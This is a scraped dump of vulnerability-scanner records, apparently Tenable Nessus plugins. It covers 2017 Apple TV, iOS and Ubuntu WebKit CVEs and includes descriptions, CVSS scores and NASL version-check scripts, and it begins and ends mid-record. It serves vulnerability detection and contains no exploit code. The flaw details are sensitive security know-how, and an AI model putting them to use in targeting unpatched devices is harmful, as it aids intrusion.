- An out-of-bounds read error exists in WebKit when handling the bound arguments array of a bound function. An unauthenticated, remote attacker can exploit this, via specially crafted web content, to disclose memory contents. (CVE-2017-2447)
- An unspecified flaw exists in the Security component due to improper validation of OTR packets under certain conditions. A man-in-the-middle attacker can exploit this to disclose and optionally manipulate transmitted data by spoofing the TLS/SSL server via a packet that appears to be valid. (CVE-2017-2448)
- An out-of-bounds read error exists in the CoreText component when handling font files. An unauthenticated, remote attacker can exploit this, via a specially crafted file, to disclose process memory. (CVE-2017-2450)
- A buffer overflow condition exists in the Security component due to improper validation of certain input. An unauthenticated, remote attacker can exploit this, by convincing a user to run a specially crafted application, to execute arbitrary code with root privileges. (CVE-2017-2451)
- A race condition exists in the Kernel component when handling memory using the 'mach_msg' system call. An unauthenticated, remote attacker can exploit this, by convincing a user to run a specially crafted application, to cause a heap-based buffer overflow, resulting in a denial of service condition or the execution of arbitrary code with root privileges. (CVE-2017-2456)
- A buffer overflow condition exists in the Keyboards component due to improper validation of certain input. An unauthenticated, remote attacker can exploit this, by convincing a user to run a specially crafted application, to cause a denial of service condition or the execution of arbitrary code. (CVE-2017-2458)
- A denial of service vulnerability exists in the CoreText component when handling specially crafted text messages due to improper validation of certain input. An unauthenticated, remote attacker can exploit this to exhaust available resources on the system. (CVE-2017-2461)
- A heap buffer overflow condition exists in the Audio component when parsing specially crafted M4A audio files due to improper validation of certain input. An unauthenticated, remote attacker can exploit this, via a specially crafted file, to execute arbitrary code. (CVE-2017-2462)
- A memory corruption issue exists in the ImageIO component when handling specially crafted files due to improper validation of certain input. An unauthenticated, remote attacker can exploit this, via a specially crafted file, to cause a denial of service condition or the execution of arbitrary code. (CVE-2017-2467)
- A use-after-free error exists in the Kernel component in the XNU port actions extension due to improper handling of port references in error cases. A local attacker can exploit this to dereference already freed memory, resulting in the execution of arbitrary code with kernel-level privileges. (CVE-2017-2472)
- A signedness error exists in the Kernel component in the SIOCSIFORDER IOCTL due to improper validation of certain input. A local attacker can exploit this to cause an out-of-bounds read and memory corruption, resulting in a denial of service condition or the execution of arbitrary code with kernel-level privileges. (CVE-2017-2473)
- An off-by-one overflow condition exists in the Kernel component in the SIOCSIFORDER IOCTL due to improper validation of certain input. A local attacker can exploit this to cause a heap-based buffer overflow, resulting in the execution of arbitrary code with kernel-level privileges. (CVE-2017-2474)
- A universal cross-site scripting (XSS) vulnerability exists in WebKit when handling frames due to improper validation of certain input. An unauthenticated, remote attacker can exploit this, via specially crafted web content, to execute arbitrary script code in a user's browser session. (CVE-2017-2475)
- A race condition exists in the Kernel component in the necp_open() function when closing file descriptors due to improper handling of proc_fd locks. A local attacker can exploit this to dereference already freed memory, resulting in the execution of arbitrary code with kernel-level privileges. (CVE-2017-2478)
- A use-after-free error exists in WebKit when handling ElementData objects. An unauthenticated, remote attacker can exploit this, via specially crafted web content, to dereference already freed memory, resulting in the execution of arbitrary code. (CVE-2017-2481)
- A heap buffer overflow condition exists in the Kernel component within the Berkeley Packet Filter (BPF) BIOCSBLEN IOCTL due to improper validation of certain input when reattaching to an interface. A local attacker can exploit this to cause a denial of service condition or the execution of arbitrary code with kernel-level privileges. (CVE-2017-2482)
- An off-by-one error exists in the Kernel component, specifically in the audit_pipe_open() function, when handling auditpipe devices due to improper validation of certain input. A local attacker can exploit this to corrupt memory, resulting in a denial of service condition or the execution of arbitrary code with kernel-level privileges. (CVE-2017-2483)
- An unspecified memory corruption issue exists in the Security component when parsing X.509 certificates due to improper validation of certain input. An unauthenticated, remote attacker can exploit this to cause a denial of service condition or the execution of arbitrary code. (CVE-2017-2485)
- A double-free error exists in the Kernel component due to FSEVENTS_DEVICE_FILTER_64 IOCTL not properly locking devices. A local attacker can exploit this to corrupt memory, resulting in the execution of arbitrary code with elevated privileges. (CVE-2017-2490)
- A use-after-free error exists in JavaScriptCore when handling the String.replace() method. An unauthenticated, remote attacker can exploit this to dereference already freed memory, resulting in the execution of arbitrary code. (CVE-2017-2491)
- A universal cross-site scripting (XSS) vulnerability exists in JavaScriptCore due to an unspecified prototype flaw. An unauthenticated, remote attacker can exploit this, via a specially crafted web page, to execute arbitrary code in a user's browser session. (CVE-2017-2492)

Note that only 4th generation models are affected by these vulnerabilities.
(CVE-2017-2441)\n\n - A memory corruption issue exists in WebKit within the\n CoreGraphics component due to improper validation of\n certain input. An unauthenticated, remote attacker can\n exploit this, via specially crafted web content, to\n cause a denial of service condition or the execution of\n arbitrary code. (CVE-2017-2444)\n\n - A universal cross-site scripting (XSS) vulnerability\n exists in WebKit when handling frame objects due to\n improper validation of certain input. An\n unauthenticated, remote attacker can exploit this, via\n specially crafted web content, to execute arbitrary\n script code in a user's browser session. (CVE-2017-2445)\n\n - A flaw exists in WebKit due to non-strict mode functions\n that are called from built-in strict mode scripts not\n being properly restricted from calling sensitive native\n functions. An unauthenticated, remote attacker can\n exploit this, via specially crafted web content, to\n execute arbitrary code. (CVE-2017-2446)\n\n - An out-of-bounds read error exists in WebKit when\n handling the bound arguments array of a bound function.\n An unauthenticated, remote attacker can exploit this,\n via specially crafted web content, to disclose memory\n contents. (CVE-2017-2447)\n\n - An unspecified flaw exists in the Security component due\n to improper validation of OTR packets under certain\n conditions. A man-in-the-middle attacker can exploit\n this to disclose and optionally manipulate transmitted\n data by spoofing the TLS/SSL server via a packet that\n appears to be valid. (CVE-2017-2448)\n\n - An out-of-bounds read error exists in CoreText component\n when handling font files. An unauthenticated, remote\n attacker can exploit this, via a specially crafted file,\n to disclose process memory. 
(CVE-2017-2450)\n\n - A buffer overflow condition exists in the Security\n component due to improper validation of certain input.\n An unauthenticated, remote attacker can exploit this,\n by convincing a user to run a specially crafted\n application, to execute arbitrary code with root\n root privileges. (CVE-2017-2451)\n\n - A race condition exists in the Kernel component when\n handling memory using the 'mach_msg' system call. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to run a specially crafted\n application, to cause a heap-based buffer overflow,\n resulting in a denial of service condition or the\n execution of arbitrary code with root privileges.\n CVE-2017-2456)\n\n - An buffer overflow condition exists in the Keyboards\n component due to improper validation of certain input.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to run a specially crafted\n application, to cause a denial of service condition or\n the execution of arbitrary code. (CVE-2017-2458)\n\n - A denial of service vulnerability exists in the\n CoreText component when handling specially crafted text\n messages due to improper validation of certain input. An\n unauthenticated, remote attacker can exploit this to\n exhaust available resources on the system.\n (CVE-2017-2461)\n\n - A heap buffer overflow condition exists in the Audio\n component when parsing specially crafted M4A audio files\n due to improper validation of certain input. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted file, to execute arbitrary code.\n (CVE-2017-2462)\n\n - An memory corruption issue exists in the ImageIO\n component when handling specially crafted files due to\n improper validation of certain input. 
An\n unauthenticated, remote attacker can exploit this, via\n a specially crafted file, to cause a denial of service\n condition or the execution of arbitrary code.\n (CVE-2017-2467)\n\n - A use-after-free error exists in the Kernel component in\n the XNU port actions extension due to improper handling\n of port references in error cases. An local attacker can\n exploit this to deference already freed memory,\n resulting in the execution of arbitrary code with\n kernel-level privileges. (CVE-2017-2472)\n\n - A signedness error exists in the Kernel component in the\n SIOCSIFORDER IOCTL due to improper validation of certain\n input. A local attacker can exploit this to cause an\n out-of-bounds read and memory corruption, resulting in\n a denial of service condition or the execution of\n arbitrary code with kernel-level privileges.\n (CVE-2017-2473)\n\n - A off-by-one overflow condition exists in the Kernel\n component in the SIOCSIFORDER IOCTL due to improper\n validation of certain input. A local attacker can exploit\n this to cause a heap-based buffer overflow, resulting in\n the execution of arbitrary code with kernel-level\n privileges. (CVE-2017-2474)\n\n - A universal cross-site scripting (XSS) vulnerability\n exists in WebKit when handling frames due to improper\n validation of certain input. An unauthenticated, remote\n attacker can exploit this, via specially crafted web\n content, to execute arbitrary script code in a user's\n browser session. (CVE-2017-2475)\n\n - A race condition exists in the Kernel component in the\n necp_open() function when closing files descriptors due\n to improper handling of proc_fd locks. A local attacker\n can exploit this to dereference already freed memory,\n resulting in the execution of arbitrary code with\n kernel-level privileges. (CVE-2017-2478)\n\n - A use-after-free error exists in WebKit when handling\n ElementData objects. 
An unauthenticated, remote attacker\n can exploit this, via specially crafted web content, to\n dereference already freed memory, resulting in the\n execution of arbitrary code. (CVE-2017-2481)\n\n - A heap buffer overflow condition exists in the Kernel\n component within the Berkeley Packet Filter (BPF)\n BIOCSBLEN IOCTL due to improper validation of certain\n input when reattaching to an interface. A local attacker\n can exploit this to cause a denial of service condition\n or the execution of arbitrary code with kernel-level\n privileges. (CVE-2017-2482)\n\n - An off-by-one error exists in the Kernel component,\n specifically in the audit_pipe_open() function, when\n handling auditpipe devices due to improper validation of\n certain input. A local attacker can exploit this to\n corrupt memory, resulting in a denial of service\n condition or the execution of arbitrary code with\n kernel-level privileges. (CVE-2017-2483)\n\n - An unspecified memory corruption issue exists in the\n Security component when parsing X.509 certificates due\n to improper validation of certain input. An\n unauthenticated, remote attacker can exploit this to\n cause a denial of service condition or the execution of\n arbitrary code. (CVE-2017-2485)\n\n - A double-free error exists in the Kernel component due\n to FSEVENTS_DEVICE_FILTER_64 IOCTL not properly locking\n devices. A local attacker can exploit this to corrupt\n memory, resulting in the execution of arbitrary code\n with elevated privileges. (CVE-2017-2490)\n\n - A use-after-free error exists in JavaScriptCore when\n handling the String.replace() method. An\n unauthenticated, remote attacker can exploit this to\n deference already freed memory, resulting in the\n execution of arbitrary code. (CVE-2017-2491)\n\n - A universal cross-site scripting (XSS) vulnerability\n exists in JavaScriptCore due to an unspecified prototype\n flaw. 
An unauthenticated, remote attacker can exploit\n this, via a specially crafted web page, to execute\n arbitrary code in a user's browser session.\n (CVE-2017-2492)\n\nNote that only 4th generation models are affected by these\nvulnerabilities.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT207601\");\n # https://lists.apple.com/archives/security-announce/2017/Mar/msg00007.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b1dbb626\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple TV version 10.2 or later. Note that this update is\nonly available for 4th generation models.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-2490\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/04/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/04/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:apple_tv\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"appletv_version.nasl\");\n script_require_keys(\"AppleTV/Version\", \"AppleTV/Model\", \"AppleTV/URL\", \"AppleTV/Port\");\n script_require_ports(\"Services/www\", 7000);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"appletv_func.inc\");\n\nurl = get_kb_item('AppleTV/URL');\nif (empty_or_null(url)) exit(0, 'Cannot determine Apple TV URL.');\nport = get_kb_item('AppleTV/Port');\nif (empty_or_null(port)) exit(0, 'Cannot determine Apple TV port.');\n\nbuild = get_kb_item('AppleTV/Version');\nif (empty_or_null(build)) audit(AUDIT_UNKNOWN_DEVICE_VER, 'Apple TV');\n\nmodel = get_kb_item('AppleTV/Model');\nif (empty_or_null(model)) exit(0, 'Cannot determine Apple TV model.');\n\nfixed_build = \"14W265\";\ntvos_ver = '10.2';\n\n# determine gen from the model\ngen = APPLETV_MODEL_GEN[model];\n\nappletv_check_version(\n build : build,\n fix : fixed_build,\n affected_gen : 4,\n fix_tvos_ver : tvos_ver,\n model : model,\n gen : gen,\n port : port,\n url : url,\n severity : SECURITY_HOLE,\n xss : TRUE\n);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-27T15:41:24", "description": "Versions of Apple TV earlier than 10.2 are affected by multiple vulnerabilities :\n\n - An unspecified flaw exists related to 'nghttp2' and 'LibreSSL' that is triggered during the handling of a malicious HTTP/2 server. This may allow an attacker to have multiple unspecified impacts. (CVE-2017-2428)\n - A type confusion flaw exists that is triggered as certain input is not properly validated when parsing specially crafted M4A audio files. This may allow a context-dependent attacker to corrupt memory and potentially execute arbitrary code. (CVE-2017-2430)\n - A use-after-free flaw exists in 'libc++' that is triggered when demangling C++ applications. This may allow a malicious application to dereference already freed memory and potentially execute arbitrary code. 
(CVE-2017-2441)\n - A flaw exists as OTR packets are not properly validated. By spoofing the TLS/SSL server via a packet that appears valid, an attacker with the ability to intercept network traffic (e.g. MitM, DNS cache poisoning) can disclose and optionally manipulate transmitted data. (CVE-2017-2448)\n - An overflow condition exists that is triggered as certain input is not properly validated when parsing specially crafted M4A audio files. This may allow a context-dependent attacker to cause a heap-based buffer overflow, potentially allowing execution of arbitrary code. (CVE-2017-2462)\n - An unspecified flaw exists that is triggered as certain input is not properly validated when parsing X.509 certificates. This may allow a context dependent-attacker to corrupt memory and potentially execute arbitrary code.\n\nAdditional flaws exist in the following components :\n\n - Carbon (CVE-2017-2379)\n - Carbon (CVE-2017-2379)\n - CoreGraphics (CVE-2017-2417, CVE-2017-2444)\n - CoreText (CVE-2017-2435, CVE-2017-2450, CVE-2017-2461)\n - FontParser (CVE-2017-2406, CVE-2017-2407, CVE-2017-2439, CVE-2017-2487)\n - ImageIO (CVE-2017-2416, CVE-2017-2432, CVE-2017-2467)\n - Kernel (CVE-2017-2401, CVE-2017-2440, CVE-2017-2456, CVE-2017-2472, CVE-2017-2473, CVE-2017-2474, CVE-2017-2478, CVE-2017-2482, CVE-2017-2483, CVE-2017-2490)\n - Keyboards (CVE-2017-2458)\n - libarchive (CVE-2017-2390)\n - Security (CVE-2017-2451)\n - Webkit (CVE-2017-2367, CVE-2017-2378, CVE-2017-2386, CVE-2017-2394, CVE-2017-2395, CVE-2017-2396, CVE-2017-2405, CVE-2017-2415, CVE-2017-2419, CVE-2017-2424, CVE-2017-2433, CVE-2017-2442, CVE-2017-2445, CVE-2017-2446, CVE-2017-2447, CVE-2017-2454, CVE-2017-2455, CVE-2017-2459, CVE-2017-2460, CVE-2017-2464, CVE-2017-2465, CVE-2017-2466, CVE-2017-2468, CVE-2017-2469, CVE-2017-2470, CVE-2017-2471, CVE-2017-2476, CVE-2017-2481)", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-04-02T00:00:00", "type": "nessus", 
"title": "Apple TV < 10.2 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-2367", "CVE-2017-2378", "CVE-2017-2379", "CVE-2017-2386", "CVE-2017-2390", "CVE-2017-2394", "CVE-2017-2395", "CVE-2017-2396", "CVE-2017-2401", "CVE-2017-2405", "CVE-2017-2406", "CVE-2017-2407", "CVE-2017-2415", "CVE-2017-2416", "CVE-2017-2417", "CVE-2017-2419", "CVE-2017-2424", "CVE-2017-2428", "CVE-2017-2430", "CVE-2017-2432", "CVE-2017-2433", "CVE-2017-2435", "CVE-2017-2439", "CVE-2017-2440", "CVE-2017-2441", "CVE-2017-2442", "CVE-2017-2444", "CVE-2017-2445", "CVE-2017-2446", "CVE-2017-2447", "CVE-2017-2448", "CVE-2017-2450", "CVE-2017-2451", "CVE-2017-2454", "CVE-2017-2455", "CVE-2017-2456", "CVE-2017-2458", "CVE-2017-2459", "CVE-2017-2460", "CVE-2017-2461", "CVE-2017-2462", "CVE-2017-2464", "CVE-2017-2465", "CVE-2017-2466", "CVE-2017-2467", "CVE-2017-2468", "CVE-2017-2469", "CVE-2017-2470", "CVE-2017-2471", "CVE-2017-2472", "CVE-2017-2473", "CVE-2017-2474", "CVE-2017-2475", "CVE-2017-2476", "CVE-2017-2478", "CVE-2017-2481", "CVE-2017-2482", "CVE-2017-2483", "CVE-2017-2485", "CVE-2017-2487", "CVE-2017-2490"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:apple:apple_tv:*:*:*:*:*:*:*:*"], "id": "700035.PRM", "href": "https://www.tenable.com/plugins/nnm/700035", "sourceData": "Binary data 700035.prm", "cvss": {"score": 9.3, "vector": "CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:37:16", "description": "A large number of security issues were discovered in the WebKitGTK+ Web and JavaScript engines. If a user were tricked into viewing a malicious website, a remote attacker could exploit a variety of issues related to web browser security, including cross-site scripting attacks, denial of service attacks, and arbitrary code execution.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-04-11T00:00:00", "type": "nessus", "title": "Ubuntu 16.04 LTS / 16.10 : webkit2gtk vulnerabilities (USN-3257-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9642", "CVE-2016-9643", "CVE-2017-2364", "CVE-2017-2367", "CVE-2017-2376", "CVE-2017-2377", "CVE-2017-2386", "CVE-2017-2392", "CVE-2017-2394", "CVE-2017-2395", "CVE-2017-2396", "CVE-2017-2405", "CVE-2017-2415", "CVE-2017-2419", "CVE-2017-2433", "CVE-2017-2442", "CVE-2017-2445", "CVE-2017-2446", "CVE-2017-2447", "CVE-2017-2454", "CVE-2017-2455", "CVE-2017-2457", "CVE-2017-2459", "CVE-2017-2460", "CVE-2017-2464", "CVE-2017-2465", "CVE-2017-2466", "CVE-2017-2468", "CVE-2017-2469", "CVE-2017-2470", "CVE-2017-2471", "CVE-2017-2475", "CVE-2017-2476", "CVE-2017-2481"], "modified": "2019-09-18T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:libjavascriptcoregtk-4.0-18", "p-cpe:/a:canonical:ubuntu_linux:libwebkit2gtk-4.0-37", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:canonical:ubuntu_linux:16.10"], "id": "UBUNTU_USN-3257-1.NASL", "href": "https://www.tenable.com/plugins/nessus/99278", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3257-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. 
Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99278);\n script_version(\"3.7\");\n script_cvs_date(\"Date: 2019/09/18 12:31:46\");\n\n script_cve_id(\"CVE-2016-9642\", \"CVE-2016-9643\", \"CVE-2017-2364\", \"CVE-2017-2367\", \"CVE-2017-2376\", \"CVE-2017-2377\", \"CVE-2017-2386\", \"CVE-2017-2392\", \"CVE-2017-2394\", \"CVE-2017-2395\", \"CVE-2017-2396\", \"CVE-2017-2405\", \"CVE-2017-2415\", \"CVE-2017-2419\", \"CVE-2017-2433\", \"CVE-2017-2442\", \"CVE-2017-2445\", \"CVE-2017-2446\", \"CVE-2017-2447\", \"CVE-2017-2454\", \"CVE-2017-2455\", \"CVE-2017-2457\", \"CVE-2017-2459\", \"CVE-2017-2460\", \"CVE-2017-2464\", \"CVE-2017-2465\", \"CVE-2017-2466\", \"CVE-2017-2468\", \"CVE-2017-2469\", \"CVE-2017-2470\", \"CVE-2017-2471\", \"CVE-2017-2475\", \"CVE-2017-2476\", \"CVE-2017-2481\");\n script_xref(name:\"USN\", value:\"3257-1\");\n\n script_name(english:\"Ubuntu 16.04 LTS / 16.10 : webkit2gtk vulnerabilities (USN-3257-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A large number of security issues were discovered in the WebKitGTK+\nWeb and JavaScript engines. If a user were tricked into viewing a\nmalicious website, a remote attacker could exploit a variety of issues\nrelated to web browser security, including cross-site scripting\nattacks, denial of service attacks, and arbitrary code execution.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3257-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected libjavascriptcoregtk-4.0-18 and / or\nlibwebkit2gtk-4.0-37 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libjavascriptcoregtk-4.0-18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libwebkit2gtk-4.0-37\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/02/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/04/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/04/11\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2017-2019 Canonical, Inc. / NASL script (C) 2017-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(16\\.04|16\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 16.04 / 16.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libjavascriptcoregtk-4.0-18\", pkgver:\"2.16.1-0ubuntu0.16.04.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libwebkit2gtk-4.0-37\", pkgver:\"2.16.1-0ubuntu0.16.04.1\")) flag++;\nif (ubuntu_check(osver:\"16.10\", pkgname:\"libjavascriptcoregtk-4.0-18\", pkgver:\"2.16.1-0ubuntu0.16.10.1\")) flag++;\nif (ubuntu_check(osver:\"16.10\", pkgname:\"libwebkit2gtk-4.0-37\", pkgver:\"2.16.1-0ubuntu0.16.10.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libjavascriptcoregtk-4.0-18 / libwebkit2gtk-4.0-37\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:37:14", "description": "The version of iOS running on the mobile device is prior to 10.3, and is affected by 
multiple vulnerabilities :\n\n - An unspecified state management flaw exists that may allow a context-dependent attacker to spoof the address bar. No further details have been provided. (CVE-2017-2376)\n - An unspecified flaw exists in the handling of HTTP authentication. This may allow a context-dependent attacker to display authentication sheets on arbitrary web sites and cause a denial of service. (CVE-2017-2389)\n - A flaw exists in the password-protected PDF export feature that is triggered as a weak encryption algorithm is used. This may allow an attacker with access to a password-protected document to potentially disclose the document content. (CVE-2017-2391)\n - A flaw exists in the 'SecKeyRawVerify()' function that is triggered as parameters are not properly validated during the handling of cryptographic API calls. This may allow a remote attacker to have an empty signature be accepted as valid. (CVE-2017-2423)\n\nAdditional flaws exist in the following components :\n\n - Carbon (CVE-2017-2379)\n - CoreGraphics (CVE-2017-2417)\n - DataAccess (CVE-2017-2414)\n - FontParser (CVE-2017-2406, CVE-2017-2407)\n - iCloud (CVE-2017-2397)\n - ImageIO (CVE-2017-2416)\n - iTunes Store (CVE-2017-2412)\n - Kernel (CVE-2017-2398, CVE-2017-2401, CVE-2017-2490)\n - libarchive (CVE-2017-2390)\n - Pasteboard (CVE-2017-2399)\n - Quick Look (CVE-2017-2404)\n - Safari (CVE-2017-2384, CVE-2017-2393, CVE-2017-2400)\n - Webkit (CVE-2017-2367, CVE-2017-2378, CVE-2017-2386, CVE-2017-2394, CVE-2017-2395, CVE-2017-2396, CVE-2017-2405, CVE-2017-2415, CVE-2017-2419, CVE-2017-2424, CVE-2017-2433, CVE-2017-2442, CVE-2017-2445, CVE-2017-2446, CVE-2017-2447, CVE-2017-2454, CVE-2017-2455, CVE-2017-2459, CVE-2017-2460, CVE-2017-2464, CVE-2017-2465, CVE-2017-2466, CVE-2017-2468, CVE-2017-2469, CVE-2017-2470, CVE-2017-2471, CVE-2017-2476, CVE-2017-2481)", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-03-31T00:00:00", "type": "nessus", 
"title": "Apple iOS < 10.3 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-2367", "CVE-2017-2376", "CVE-2017-2386", "CVE-2017-2394", "CVE-2017-2395", "CVE-2017-2396", "CVE-2017-2405", "CVE-2017-2415", "CVE-2017-2419", "CVE-2017-2433", "CVE-2017-2442", "CVE-2017-2445", "CVE-2017-2446", "CVE-2017-2447", "CVE-2017-2454", "CVE-2017-2455", "CVE-2017-2457", "CVE-2017-2459", "CVE-2017-2460", "CVE-2017-2464", "CVE-2017-2465", "CVE-2017-2466", "CVE-2017-2468", "CVE-2017-2469", "CVE-2017-2470", "CVE-2017-2471", "CVE-2017-2475", "CVE-2017-2476", "CVE-2017-2481", "CVE-2017-2379", "CVE-2017-2390", "CVE-2017-2398", "CVE-2017-2401", "CVE-2017-2406", "CVE-2017-2407", "CVE-2017-2416", "CVE-2017-2417", "CVE-2017-2423", "CVE-2017-2428", "CVE-2017-2430", "CVE-2017-2432", "CVE-2017-2435", "CVE-2017-2439", "CVE-2017-2440", "CVE-2017-2441", "CVE-2017-2448", "CVE-2017-2450", "CVE-2017-2451", "CVE-2017-2456", "CVE-2017-2458", "CVE-2017-2461", "CVE-2017-2462", "CVE-2017-2467", "CVE-2017-2472", "CVE-2017-2473", "CVE-2017-2474", "CVE-2017-2478", "CVE-2017-2482", "CVE-2017-2483", "CVE-2017-2485", "CVE-2017-2487", "CVE-2017-2490", "CVE-2017-2484", "CVE-2017-2404", "CVE-2017-2389", "CVE-2017-2399", "CVE-2017-2453", "CVE-2017-2486", "CVE-2017-2412", "CVE-2017-2444", "CVE-2017-2397", "CVE-2017-2414", "CVE-2017-2434", "CVE-2017-2384", "CVE-2017-2393", "CVE-2017-2400", "CVE-2017-2452", "CVE-2017-2378", "CVE-2017-2424", "CVE-2017-2391"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*"], "id": "700034.PRM", "href": "https://www.tenable.com/plugins/nnm/700034", "sourceData": "Binary data 700034.prm", "cvss": {"score": 9.3, "vector": "CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-21T14:20:58", "description": "The version of Apple iOS running on the mobile device is prior to 10.3. 
